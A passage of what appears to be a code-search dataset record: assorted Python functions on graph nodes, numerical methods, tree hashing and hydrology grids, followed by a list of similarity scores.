dfNew.iloc[b-1].copy()\n dfNew.iloc[a-1],dfNew.iloc[b-1] = y,x\n\n return reCalc", "def Dijkstra2(node_init, node_end, graph):\n\n ### Parameter initialisation\n node_list = list(graph.vertices.keys())\n dist = np.full(len(node_list), -np.inf)\n # At the beginning we have not reached the end_node\n node_end_reached = False\n # At the beginning, we assume there is a shortest path:\n no_path = False\n \n # Initialising the distances of the nodes\n dist[node_init] = 0\n # Setting the father_node which contains the provenance of the nodes\n father_node = np.full(len(node_list), -np.inf)\n # Initialising the current node\n current_node = node_init \n # Initialising the dictionnary of fixed node which has the following shape:\n #{fixed_node: (previous_node, iteration, cost)}\n # Fixing the number of iterations\n k = 0\n dict_fixed_node = {node_init:(None,k, 0)}\n \n # In the trivial case where the two nodes are identical\n if node_init == node_end:\n cost = 0\n shortest_path = [node_init]\n no_path = False\n return cost, shortest_path, no_path\n \n # While the end node has not been reached\n while not node_end_reached:\n current_node_adj = graph.node_get_adj(current_node).copy()\n # We get rid off the nodes that have been fixed, except at the first iteration\n if k != 0:\n current_node_adj.remove(dict_fixed_node[current_node][0])\n ## Updating the distances : either the node are neighbors and \n # something might change, either they are not, and their distance \n # does not change.\n # For the neighbors node\n for e in current_node_adj:\n dist_temp = dist[current_node] + graph.weights[(current_node, e)]\n # We change the distance only if it is lower than it used to be\n # otherwise, we keep it\n if dist_temp < dist[e] or dist[e] == -np.inf:\n dist[e] = dist_temp\n # Setting the father node\n father_node[e] = current_node\n father_node[current_node] = None\n # We set the distance of the current node to 0\n dist[current_node] = 0 \n # Index and distances which are not 0 and not minus infty\n sub_dist_index = [i for i, e in enumerate(dist) if e > 0]\n sub_dist_value = np.array([e for i, e in enumerate(dist) if e > 0])\n # If these two lists are empty, we stop the algorithm and that means\n # that we cannot reach our point\n if not sub_dist_index or sub_dist_value.size == 0:\n no_path = True\n cost = 'impossible path'\n shortest_path = 'impossible path'\n break\n # Now we need to set our choice for the next node\n if np.array_equal(sub_dist_value, np.ones(len(sub_dist_value))):\n ## If there are only ones : we pick them up randomly\n current_node = int(random.choice(list(sub_dist_index)))\n min_dist = sub_dist_value.min()\n else:\n ## If not we just pick up the one with the minimum distance.\n current_node = sub_dist_index[sub_dist_value.argmin()]\n min_dist = sub_dist_value.min()\n # Adding this node to the dictionnary\n dict_fixed_node[current_node] = (int(father_node[current_node]), k, min_dist)\n # If the end_node has been reached, we stop the search algorithm\n if node_end in dict_fixed_node.keys():\n node_end_reached = True\n # Incrementing the counter\n k += 1\n #print('current_node : {}'.format(current_node))\n #print(dict_fixed_node)\n # Now we need to get the shortest path from our iterations whose information \n # are in dict_fixed_node. 
To do this, we need to circle back from the end_node\n # to the init_node in this dictionnary.\n # This is done only if some path between node_init and end_node exists.\n if no_path == False:\n list_father_node = list(dict_fixed_node.values())\n previous_node = list_father_node[-1][0]\n shortest_path = [node_end, previous_node]\n # While the initial node has not been reached, we add the relevant\n # nodes to our shortest path\n while previous_node != node_init:\n previous_node = dict_fixed_node[previous_node][0]\n shortest_path.append(previous_node)\n \n # Computing the cost of this shortest path in terms of weights\n cost = int(dict_fixed_node[node_end][2])\n \n return cost, shortest_path, no_path", "async def calc_nodes(height, balances, zero_nodes_lookup, root_index, hash_func):\n if len(balances) == 0:\n return {root_index: zero_nodes_lookup[height]}\n if height == 0:\n assert len(balances) == 1\n _, vault_data = balances[-1]\n balance = int(vault_data['amount'])\n # A node with balance=0 is considered uninitialized.\n if balance == 0:\n return {root_index: zero_nodes_lookup[0]}\n stark_key = int(vault_data['stark_key'])\n token_id = int(vault_data['token_id'])\n return {root_index: await vault_hash_async(stark_key, token_id, balance, hash_func)}\n mid = 2 ** (height - 1)\n left_balances = [(i, data) for i, data in balances if i < mid]\n right_balances = [(i - mid, data) for i, data in balances if i >= mid]\n left, right = await asyncio.gather(\n calc_nodes(height - 1, left_balances, zero_nodes_lookup, 2 * root_index, hash_func),\n calc_nodes(height - 1, right_balances, zero_nodes_lookup, 2 * root_index + 1, hash_func))\n nodes = {root_index: await hash_func(left[2 * root_index], right[2 * root_index + 1])}\n nodes.update(left)\n nodes.update(right)\n return nodes", "def transform(nodes, weights, new_corners):\n if nodes.shape[1] == 1:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n M = np.zeros((1, 1))\n M[:, 0] = 0.5 * (x_1 - x_0)\n origin = np.array([-1.0])\n elif nodes.shape[1] == 2:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n x_2 = new_corners[2, :]\n M = np.zeros((2, 2))\n M[:, 0] = 0.5 * (x_1 - x_0)\n M[:, 1] = 0.5 * (x_2 - x_0)\n origin = np.array([-1.0, -1.0])\n elif nodes.shape[1] == 3:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n x_2 = new_corners[2, :]\n x_3 = new_corners[3, :]\n M = np.zeros((3, 3))\n M[:, 0] = 0.5 * (x_1 - x_0)\n M[:, 1] = 0.5 * (x_2 - x_0)\n M[:, 2] = 0.5 * (x_3 - x_0)\n origin = np.array([-1.0, -1.0, -1.0])\n\n offset = -M @ origin + x_0\n volume_fraction = np.abs(np.linalg.det(M))\n return np.add(nodes @ M.T, offset), volume_fraction * weights", "def create_leaves(self, parent_node, leaf_values):\n # TODO: find generalization!!\n import numpy as np\n # creating the leaf object\n parent_node.child_nodes[0] = self.leaf_type(0.0, 0, diagram_type=self.__class__)\n\n # creating the offsets\n # deciding on mult or add rule\n # additive_coefficient = np.mean(leaf_values)\n # new_offsets = np.array([leaf_values[i]-additive_coefficient for i in range(self.base)])\n # max_difference = np.max(np.abs(new_offsets))\n # mult_coefficient = max_difference if max_difference != 0.0 else 1.0\n # for i in range(self.base):\n # node.child_nodes[i] = node.child_nodes[0]\n # node.offsets[i] = np.array([((new_offsets[i])/mult_coefficient), mult_coefficient], dtype='float64')\n # return node, [additive_coefficient, mult_coefficient]\n if leaf_values[0] == 0 or (leaf_values[1]-leaf_values[0] < leaf_values[1]/leaf_values[0]):\n parent_node.offsets[0] = 
np.array([0, 1], dtype='float64')\n for i in range(1, self.base, 1):\n parent_node.child_nodes[i] = parent_node.child_nodes[0]\n parent_node.offsets[i] = np.array([(leaf_values[i]-leaf_values[0]), 1], dtype='float64')\n return parent_node, [leaf_values[0], 1]\n else:\n parent_node.offsets[0] = np.array([1, 1], dtype='float64')\n for i in range(1, self.base, 1):\n parent_node.child_nodes[i] = parent_node.child_nodes[0]\n parent_node.offsets[i] = np.array([leaf_values[i]/leaf_values[0], (leaf_values[i]/leaf_values[0])],\n dtype='float64')\n return parent_node, [0, leaf_values[0]]", "def computeNodeErrors(net, inputs, actualOutputs):\n errors = {}\n squareError = 0.0\n label = net.run(inputs)\n predictedOutputs = [1.0 if l == label else 0.0 for l in net.validLabels]\n for i, node in enumerate(net.outputLayer):\n errors[node] = predictedOutputs[i] - actualOutputs[i]\n squareError += errors[node] ** 2\n if squareError == 0.0: # No need to continue\n return ({node:0.0 for node in net.nodes}, 0.0)\n reversedLayers = net.hiddenLayers[:]\n reversedLayers.reverse()\n toBeComputed = []\n for layer in reversedLayers:\n toBeComputed += layer\n while len(toBeComputed) > 0: # Repeat until all nodes processed\n newToBeComputed = []\n for node in toBeComputed:\n notComputable = False\n totalChildError = 0\n for child in node.children:\n if child not in errors: # Cannot yet compute\n notComputable = True\n break\n childError = errors[child]\n weight = child.weights[node]\n totalChildError += childError * weight\n if notComputable:\n newToBeComputed.append(node)\n else:\n activationDerivative = DERIVATIVES[node.activationFunc]\n if activationDerivative is None:\n raise TrainingError(\"Activation function of node \"\n + str(node) + \" is non-differentiable.\")\n weightedInput = node.getWeightedInputSum(BYPASS)\n nodeDerivative = activationDerivative(weightedInput)\n errors[node] = nodeDerivative * totalChildError\n toBeComputed = newToBeComputed\n return (errors, squareError)", "def newton_method_bidirectional(f, bnd1, bnd2, Ep, step):\n\n while True:\n step = step + 1\n\n # print(\"bnd1=\",bnd1,\" and bnd2=\",bnd2)\n\n h_bnd1 = f(bnd1) / derivative(f, bnd1)\n bnd1 = bnd1 - h_bnd1\n if (decide(abs(h_bnd1) <= Ep)):\n # print(\"Root in Approximation: \",bnd1)\n return step\n\n h_bnd2 = f(bnd2) / derivative(f, bnd2)\n bnd2 = bnd2 - h_bnd2\n if (decide(abs(h_bnd2) <= Ep)):\n # print(\"Root in Approximation: \",bnd2)\n return step", "def algorithm(self):\n t = time.clock()\n self.calculateFirstPath()\n improve = True\n while improve and (self.allowedTime > (time.clock() - t)):\n improve = False\n\n for i in range(self.NB_OF_NODES):\n for j in range(self.NB_OF_NODES):\n if j in [(i - 1) % self.NB_OF_NODES, i, (i + 1) % self.NB_OF_NODES]:\n continue\n\n if self.getDistance(i, i + 1) + self.getDistance(j, j + 1) > self.getDistance(i, j) + self.getDistance(i + 1, j + 1):\n self.exchange(i, j)\n improve = True", "def evaluate(\n self, nodes, derivatives=np.array([0, 0, 0]), modes=None, unique=False\n ):", "def rewire(self, new_node, near_indexes):\n\n for i in near_indexes:\n near_node = self.node_list[i]\n edge_node = self.steer(new_node, near_node)\n if not edge_node:\n continue\n edge_node.cost = self.calc_new_cost(new_node, near_node)\n\n no_collision = self.check_collision(edge_node, self.obstacle_list)\n improved_cost = near_node.cost > edge_node.cost\n\n if no_collision and improved_cost:\n self.node_list[i] = edge_node\n self.propagate_cost_to_leaves(new_node)", "def find_all_feedbacks_Tarjan(ls_nodenames, 
lt_links):\n \n ll_SCC = SCC_analysis.decompose_SCC(ls_nodenames, lt_links)\n ll_feedbacks = []\n for l_SCC in ll_SCC:\n lt_links_in_SCC = basic_topology_functions.extract_subnet_topology(lt_links, l_SCC)\n print(\"feedbacks are calculated in subnetwork with \",len(l_SCC),\" nodes\")\n \n dic_startnode_endnodes = {}\n for s_nodename in l_SCC:\n dic_startnode_endnodes[s_nodename] = []\n for t_link in lt_links_in_SCC:\n if t_link[0] == s_nodename:\n dic_startnode_endnodes[s_nodename].append(t_link[-1])\n #print(dic_startnode_endnodes)\n dic_node_counter = {}\n for s_nodename in l_SCC:\n dic_node_counter[s_nodename] = len(dic_startnode_endnodes[s_nodename])-1\n #print(dic_node_counter)\n for s_node_trajectorystart in dic_node_counter.keys():\n if dic_node_counter[s_node_trajectorystart] == -1: #this means that all feedback containing this node are all calculated\n continue\n else:\n l_trajectory = [s_node_trajectorystart]\n while l_trajectory:\n #print(l_trajectory)\n i_counter = dic_node_counter[l_trajectory[-1]]\n if i_counter == -1:\n dic_node_counter[l_trajectory[-1]] = len(dic_startnode_endnodes[l_trajectory[-1]])-1\n l_trajectory.pop()\n if l_trajectory:\n dic_node_counter[l_trajectory[-1]] -= 1\n else:\n s_node_next = dic_startnode_endnodes[l_trajectory[-1]][i_counter]\n if s_node_next == s_node_trajectorystart:\n ll_feedbacks.append(list(l_trajectory))\n if len(ll_feedbacks)%20000 == 0:\n print(\"calculated feedbacks are now \",len(ll_feedbacks))\n \n if s_node_next in l_trajectory:\n dic_node_counter[l_trajectory[-1]] -= 1\n else:\n l_trajectory.append(s_node_next)\n dic_startnode_endnodes[s_node_trajectorystart] = []\n dic_node_counter[s_node_trajectorystart] =-1\n \n return ll_feedbacks", "def perform(self, node, inputs, outputs):\r\n x, w, v, W, V = inputs\r\n N = x.shape[0]\r\n outer = numpy.outer\r\n\r\n G = lambda n: sum(v[:, m] * V.T[n].dot(v[:, m]) / (w[n] - w[m])\r\n for m in xrange(N) if m != n)\r\n g = sum(outer(v[:, n], v[:, n] * W[n] + G(n))\r\n for n in xrange(N))\r\n\r\n # Numpy's eigh(a, 'L') (eigh(a, 'U')) is a function of tril(a)\r\n # (triu(a)) only. This means that partial derivative of\r\n # eigh(a, 'L') (eigh(a, 'U')) with respect to a[i,j] is zero\r\n # for i < j (i > j). At the same time, non-zero components of\r\n # the gradient must account for the fact that variation of the\r\n # opposite triangle contributes to variation of two elements\r\n # of Hermitian (symmetric) matrix. The following line\r\n # implements the necessary logic.\r\n out = self.tri0(g) + self.tri1(g).T\r\n\r\n # The call to self.tri0 in perform upcast from float32 to\r\n # float64 or from int* to int64 in numpy 1.6.1 but not in\r\n # 1.6.2. 
We do not want version dependent dtype in Theano.\r\n # We think it should be the same as the output.\r\n outputs[0][0] = numpy.asarray(out, dtype=node.outputs[0].dtype)", "def my_Newton( fct, df_dx, x0):\r\n xn = float(x0)\r\n eps = 1e-5\r\n N = 20\r\n i = 0\r\n while abs( fct( xn**(i + 1)) - fct( xn**i)) > eps and i < N:\r\n x_next = xn - fct(xn)/df_dx(xn)\r\n print( i, 'fct value', abs( fct(xn)), x_next)\r\n xn = x_next\r\n i += 1\r\n if abs( fct( xn)) < eps:\r\n return x_next\r\n else: #solution did not converge\r\n return np.nan", "def brute_tree(XTRAIN,istopTRAIN,XTEST,istopTEST):\n \n ntrain=XTRAIN.shape[0]\n ntest=XTEST.shape[0]\n \n if np.sum(istopTRAIN)==0:\n return 0,[]\n\n cost0=np.zeros(Ngammas*Nreps)\n cost1=np.zeros(Ngammas*Nreps)\n cost0test=np.zeros(Ngammas*Nreps)\n cost1test=np.zeros(Ngammas*Nreps)\n \n precisionTRAIN=np.zeros(Ngammas*Nreps)\n precisionTEST=np.zeros(Ngammas*Nreps)\n recallTEST=np.zeros(Ngammas*Nreps)\n rate=np.zeros(Ngammas*Nreps)\n \n for iii in range(Ngammas):\n \n gamma=GAMMA[iii]\n \n for jjj in range(Nreps):\n \n \"\"\" train a tree using training data with random splitting \"\"\"\n \n tree_hyperparameters['class_weight']={0:1,1:gamma}\n clf=tree.DecisionTreeClassifier(**tree_hyperparameters)\n clf.fit(XTRAIN,istopTRAIN)\n \n \"\"\"\" record costs and precision on validation data \"\"\"\n \n pTRAIN=clf.predict(XTRAIN)\n precisionTRAIN[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==1),sum(pTRAIN))\n cost0[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==0)\n cost1[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 0 and istopTRAIN[i]==1)\n \n \"\"\" record precision on test data \"\"\"\n \n pTEST=clf.predict(XTEST)\n precisionTEST[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1),sum(pTEST))\n recallTEST[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1)/sum(istopTEST)\n cost0test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==0)\n cost1test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 0 and istopTEST[i]==1)\n \n \"\"\" record positive rate on full data \"\"\"\n \n rate[iii*Nreps+jjj]=(sum(pTRAIN)+sum(pTEST))/(ntrain+ntest)\n \n \"\"\" Compute Pareto front for validation data \"\"\"\n \n Pareto = Lower_Convex_Hull(np.concatenate((cost0.reshape(-1,1),cost1.reshape(-1,1)),1))\n \n \"\"\" make some nice plots for whoever is watching \"\"\"\n \n plt.figure(figsize=(10,5))\n plt.subplot(121)\n plt.plot(cost0,cost1,'.')\n plt.plot(cost0[Pareto],cost1[Pareto],'d')\n plt.xlabel('errors on class zero training data')\n plt.ylabel('errors on class one training data')\n\n plt.subplot(122)\n plt.plot(cost0test,cost1test,'.')\n plt.plot(cost0test[Pareto],cost1test[Pareto],'d')\n plt.xlabel('errors on class zero test data')\n plt.ylabel('errors on class one test data')\n plt.show()\n \n plt.figure(figsize=(15,5))\n plt.subplot(131)\n plt.semilogy(precisionTRAIN,rate,'.')\n plt.semilogy(precisionTRAIN[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on training data')\n plt.ylabel('positive rate')\n\n plt.subplot(132) \n plt.semilogy(precisionTEST,rate,'.')\n plt.semilogy(precisionTEST[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('positive rate')\n\n plt.subplot(133) \n plt.plot(precisionTEST,recallTEST,'.')\n plt.plot(precisionTEST[Pareto],recallTEST[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('recall on test 
data')\n plt.show() \n \n return {'cost0':cost0,'cost1':cost1,'cost0test':cost0test,'cost1test':cost1test,'precisionTRAIN':precisionTRAIN,'precisionTEST':precisionTEST,'recallTEST':recallTEST,'rate':rate,'Pareto':Pareto}", "def handle_leaf_nodes(self, nodes):\n max_node_id = -1\n for n in nodes:\n n.sum_hess = self.decrypt(n.sum_hess)\n n.sum_grad = self.decrypt(n.sum_grad)\n n.weight = self.splitter.node_weight(n.sum_grad, n.sum_hess)\n n.sitename = self.sitename\n if n.id > max_node_id:\n max_node_id = n.id\n new_nodes = [Node() for i in range(max_node_id + 1)]\n for n in nodes:\n new_nodes[n.id] = n\n return new_nodes", "def label_correcting_algo(dt, ori_node, des_node, do_return=False):\n # Convert all labels to string\n ori = str(ori_node)\n des = str(des_node)\n dt[[\"start\", \"end\"]] = dt[[\"start\", \"end\"]].astype(str) \n \n # Initialization\n nodes = set(dt.loc[:,\"start\"].unique()) | set(dt.loc[:,\"end\"].unique())\n dist = {}.fromkeys(nodes, np.inf)\n dist[ori] = 0\n points = {}.fromkeys(nodes, ori)\n iter_set = {ori}\n \n # Main Algo\n while iter_set:\n i = iter_set.pop() # Randomly pop out a node i\n A_i = dt[dt.start == i]\n for row in A_i.index: \n j = A_i.loc[:, \"end\"][row]\n c_ij = A_i.loc[:, \"cost\"][row]\n if dist[j] > dist[i] + c_ij:\n dist[j] = dist[i] + c_ij\n points[j] = i\n iter_set = iter_set | set([j]) # Union\n \n # Print & Return the Answer\n x = pd.concat([pd.Series(points), pd.Series(dist)], axis=1)\n x.columns = [\"Front-node\", \"Distance\"]\n\n current_node = des\n front_node = \"\"\n sp = des\n while front_node != ori:\n front_node = str(x.loc[current_node, \"Front-node\"])\n sp = \"{} -> {}\".format(front_node, sp)\n current_node = front_node\n \n sp = \"From node {} to node {}, total Distance: {}\\n{}\\n\".format(ori, des, x.loc[des, \"Distance\"], sp)\n if do_return:\n print(sp)\n return x\n else:\n return sp", "def calculate_distance_to_divide(\n grid, longest_path=True, add_to_grid=False, clobber=False\n):\n # check that flow__receiver nodes exists\n if \"flow__receiver_node\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__receiver_node' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"flow__upstream_node_order\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"drainage_area\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n # get the reciever nodes, depending on if this is to-one, or to-multiple,\n # we'll need to get a different at-node field.\n if grid.at_node[\"flow__receiver_node\"].size != grid.size(\"node\"):\n to_one = False\n else:\n to_one = True\n\n flow__receiver_node = grid.at_node[\"flow__receiver_node\"]\n drainage_area = grid.at_node[\"drainage_area\"]\n\n # get the upstream node order\n flow__upstream_node_order = grid.at_node[\"flow__upstream_node_order\"]\n\n # get downstream flow link lengths, result depends on type of grid.\n if isinstance(grid, RasterModelGrid):\n flow_link_lengths = grid.length_of_d8[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n else:\n flow_link_lengths = grid.length_of_link[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n\n # create an array that representes the distance to the divide.\n distance_to_divide = np.zeros(grid.nodes.size)\n\n if not longest_path:\n distance_to_divide[:] = 2 * grid.size(\"node\") * np.max(flow_link_lengths)\n\n # iterate through the 
flow__upstream_node_order backwards.\n for node in reversed(flow__upstream_node_order):\n # if drainage are is equal to node cell area, set distance to zeros\n # this should handle the drainage divide cells as boundary cells have\n # their area set to zero.\n if drainage_area[node] == grid.cell_area_at_node[node]:\n distance_to_divide[node] = 0\n\n # get flow recievers\n reciever = flow__receiver_node[node]\n\n if to_one:\n # if not processing an outlet node.\n if reciever != node:\n if longest_path:\n cond = (\n distance_to_divide[reciever]\n < distance_to_divide[node] + flow_link_lengths[node]\n )\n else:\n cond = (\n distance_to_divide[reciever]\n > distance_to_divide[node] + flow_link_lengths[node]\n )\n\n if cond:\n distance_to_divide[reciever] = (\n distance_to_divide[node] + flow_link_lengths[node]\n )\n\n else:\n # non-existant links are coded with -1\n useable_receivers = np.where(reciever != grid.BAD_INDEX)[0]\n\n for idx in range(len(useable_receivers)):\n r = reciever[useable_receivers][idx]\n fll = flow_link_lengths[node][useable_receivers][idx]\n\n # if not processing an outlet node.\n if r != node:\n if longest_path:\n cond = distance_to_divide[r] < distance_to_divide[node] + fll\n else:\n cond = distance_to_divide[r] > distance_to_divide[node] + fll\n\n if cond:\n distance_to_divide[r] = distance_to_divide[node] + fll\n\n # store on the grid\n if add_to_grid:\n grid.add_field(\n \"distance_to_divide\", distance_to_divide, at=\"node\", clobber=clobber\n )\n\n return distance_to_divide", "def newtonsMethod(f, df, ddf, x, niter=10):\n\n points = []\n\n for i in xrange(niter):\n point = np.dot(-la.inv(ddf(x)), (df(x)))\n\n slope = np.dot(df(x), point)\n\n a = backtracking(f, slope, x, point)\n \n #update point\n x_k = x + a*point\n points.append(x_k)\n x = x_k\n\n return points" ]
[ "0.65839136", "0.57315016", "0.567347", "0.55890775", "0.55738044", "0.5463602", "0.54403263", "0.5439998", "0.5405277", "0.53822875", "0.5344752", "0.5334331", "0.5325484", "0.5318365", "0.53122985", "0.53017414", "0.5295547", "0.5275849", "0.52737594", "0.52574426", "0.5230346", "0.52266407", "0.5218263", "0.5185318", "0.51770127", "0.5173949", "0.5160851", "0.5157591", "0.51378775", "0.5133119", "0.51289505", "0.5125523", "0.5108133", "0.51064736", "0.5104259", "0.5103502", "0.5081732", "0.5076288", "0.5071857", "0.50684774", "0.5065425", "0.50579035", "0.50561845", "0.5056071", "0.5039873", "0.50350887", "0.503006", "0.5029164", "0.50276995", "0.50238025", "0.50192326", "0.50077516", "0.50068814", "0.49979854", "0.49950433", "0.49872214", "0.4986004", "0.49854264", "0.4978293", "0.4977638", "0.49750566", "0.49637634", "0.49631697", "0.49588704", "0.4954976", "0.4951387", "0.4945267", "0.49444473", "0.49434066", "0.4940878", "0.49375913", "0.49338678", "0.49338412", "0.4928129", "0.49236566", "0.49182633", "0.49153966", "0.49121758", "0.49117246", "0.49077004", "0.4906052", "0.49051553", "0.49036717", "0.49035296", "0.48919111", "0.4884319", "0.4883693", "0.4875527", "0.48731244", "0.4872033", "0.4870849", "0.48670393", "0.4865498", "0.48618716", "0.48583892", "0.48449036", "0.48444298", "0.4838655", "0.48371902", "0.48324525" ]
0.6325345
1
Calculates divided differences for the given interpolation nodes. It is assumed that at least two interpolation nodes are provided. Each tuple in the returned list represents one level of the divided-differences tree.
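The divided differences referred to here are the standard Newton divided differences, built level by level from the recurrence

f[x_i] = y_i, \qquad f[x_i, \ldots, x_{i+k}] = \frac{f[x_{i+1}, \ldots, x_{i+k}] - f[x_i, \ldots, x_{i+k-1}]}{x_{i+k} - x_i},

so for n input nodes, level k of the tree holds the n - k differences of order k.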
def calculate_divided_differences(nodes):
    # Wrap each (x, y) interpolation node in a DividedDifferenceNode; the y
    # value serves as the zeroth-order divided difference f[x].
    nodes_to_compute = []
    divided_differences = []

    for node in nodes:
        nodes_to_compute.append(DividedDifferenceNode(x=node[0], divided_difference=node[1]))

    # Level 0 of the tree is the input nodes themselves.
    divided_differences.append(tuple(nodes_to_compute))

    # Each pass collapses n nodes into n - 1 differences of the next order,
    # recording one level of the tree per iteration until a single top-level
    # difference remains.
    while len(nodes_to_compute) > 1:
        next_node_row = calculate_divided_differences_row(nodes_to_compute)
        divided_differences.append(tuple(next_node_row))
        nodes_to_compute = next_node_row

    return divided_differences
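A minimal sketch of the two collaborators the function above calls but does not define, DividedDifferenceNode and calculate_divided_differences_row, with their interfaces inferred from the call sites (keyword constructor, create_child_node, calculate_value); every name, signature, and attribute below is an assumption for illustration, not the original implementation:

class DividedDifferenceNode:
    def __init__(self, x, divided_difference, x_right=None):
        self.x = x  # leftmost abscissa this node covers (assumed attribute)
        self.x_right = x if x_right is None else x_right  # rightmost abscissa
        self.divided_difference = divided_difference
        self.left = None
        self.right = None

    @staticmethod
    def create_child_node(left, right):
        # A child spans the union of its parents' abscissa ranges.
        child = DividedDifferenceNode(x=left.x, divided_difference=None,
                                      x_right=right.x_right)
        child.left, child.right = left, right
        return child

    def calculate_value(self):
        # f[x_i..x_{i+k}] = (f[x_{i+1}..x_{i+k}] - f[x_i..x_{i+k-1}]) / (x_{i+k} - x_i)
        self.divided_difference = (
            (self.right.divided_difference - self.left.divided_difference)
            / (self.x_right - self.x)
        )


def calculate_divided_differences_row(nodes_to_compute):
    # One level up the tree: pair adjacent nodes and evaluate each child.
    row = []
    for left, right in zip(nodes_to_compute, nodes_to_compute[1:]):
        child = DividedDifferenceNode.create_child_node(left, right)
        child.calculate_value()
        row.append(child)
    return row


# Example: f(x) = x**2 sampled at x = 0, 1, 3; the top-level difference is 1.
levels = calculate_divided_differences([(0.0, 0.0), (1.0, 1.0), (3.0, 9.0)])
for level in levels:
    print([node.divided_difference for node in level])
# -> [0.0, 1.0, 9.0]
# -> [1.0, 4.0]
# -> [1.0]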
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_divided_differences_row(nodes_to_compute):\n divided_differences = []\n\n if len(nodes_to_compute) == 1:\n return None\n\n for i in range(0, len(nodes_to_compute) - 1):\n child = DividedDifferenceNode.create_child_node(nodes_to_compute[i], nodes_to_compute[i + 1])\n child.calculate_value()\n divided_differences.append(child)\n\n for node in divided_differences:\n print(node, end='')\n\n print('\\n')\n return divided_differences", "def diff(self):\n return [node.diff for node in self]", "def test_frac_diffNonGaps(self):\n s1 = self.RNA(\"AAAA\")\n s2 = self.RNA(\"AGGG\")\n s3 = self.RNA(\"GGGG\")\n s4 = self.RNA(\"AG--GA-G\")\n s5 = self.RNA(\"CU--CU-C\")\n s6 = self.RNA(\"AC--GC-G\")\n s7 = self.RNA(\"--------\")\n s8 = self.RNA(\"AAAA----\")\n s9 = self.RNA(\"A-GG-A-C\")\n e = self.RNA(\"\")\n\n def test(x, y, z):\n return self.assertFloatEqual(x.frac_diff_non_gaps(y), z)\n\n test(s1, s2, 0.75)\n test(s1, s3, 1)\n test(s2, s3, 0.25)\n test(s1, s4, 0.5)\n test(s4, s5, 1)\n test(s4, s6, 0.4)\n test(s4, s7, 0)\n test(s4, s8, 0.5)\n test(s4, s9, 1 / 3.0)\n test(e, s4, 0)", "def getSubdivisionNodes(self, signature):\n x, y, z = signature[0], signature[1], signature[2]\n return [(2*x+1, 2*y, 2*z), (2*x, 2*y, 2*z),\n (2*x+1, 2*y+1, 2*z), (2*x, 2*y, 2*z+1),\n (2*x+1, 2*y+1, 2*z+1), (2*x, 2*y+1, 2*z),\n (2*x+1, 2*y, 2*z+1), (2*x, 2*y+1, 2*z+1)]", "def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList", "def equiangular_dimension_unpack(nodes, ratio):\n dim1 = int((nodes / ratio) ** 0.5)\n dim2 = int((nodes * ratio) ** 0.5)\n if dim1 * dim2 != nodes: # Try to correct dim1 or dim2 if ratio is wrong\n if nodes % dim1 == 0:\n dim2 = nodes // dim1\n if nodes % dim2 == 0:\n dim1 = nodes // dim2\n assert dim1 * dim2 == nodes, f'Unable to unpack nodes: {nodes}, ratio: {ratio}'\n return dim1, dim2", "def getFractionalItems(self, startingPoint, returnFmt = 0, refinements = 1):\n\n def closest_node(node, nodes):\n\n \"\"\" returns closest node using dot vectorization, slightly faster see https://codereview.stackexchange.com/questions/28207/finding-the-closest-point-to-a-list-of-points \"\"\"\n\n if node in nodes:\n nodes.remove(node)\n\n nodes = np.asarray(nodes)\n deltas = nodes - node\n dist_2 = np.einsum('ij,ij->i', deltas, deltas)\n temp = nodes[np.argmin(dist_2)]\n return (temp[0], temp[1])\n\n def averagePoints(nodeList):\n #Consider switching to numpy mean arrays if performance is an issue\n #inits\n tempX, tempY = 0, 0\n for node in nodeList:\n tempX += node[0]\n tempY += node[1]\n \n avX, avY = tempX/len(nodeList), tempY/len(nodeList)\n avPoint = [avX, avY]\n\n return avPoint\n\n def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n \"\"\" Starts out with one point should be in a place of high density #NOTE this is not automated yet. Keep adding points (it will add the closest)\n point to the set over and over until 50% of the points are encircled. 
Then it will return a list of those points \"\"\"\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList \n\n #Gets fractional points \n numPointsFrac = math.floor(self.numPoints * self.detectionFraction)\n fracPoints = fractionalPoints(self.points, [startingPoint], numPointsFrac)\n \n #Hull creation and getting of verticies\n hull = ConvexHull(fracPoints)\n polyVertices = [fracPoints[vertex] for vertex in hull.vertices] \n cutVertices = chaikins_corner_cutting(polyVertices, refinements)\n\n #Path creation \n polyCodes = [mppath.Path.LINETO] * len(polyVertices)\n polyCodes[0] = mppath.Path.MOVETO\n polyCodes[-1] = mppath.Path.CLOSEPOLY\n\n cutCodes = [mppath.Path.LINETO] * len(cutVertices)\n cutCodes[0] = mppath.Path.MOVETO\n cutCodes[-1] = 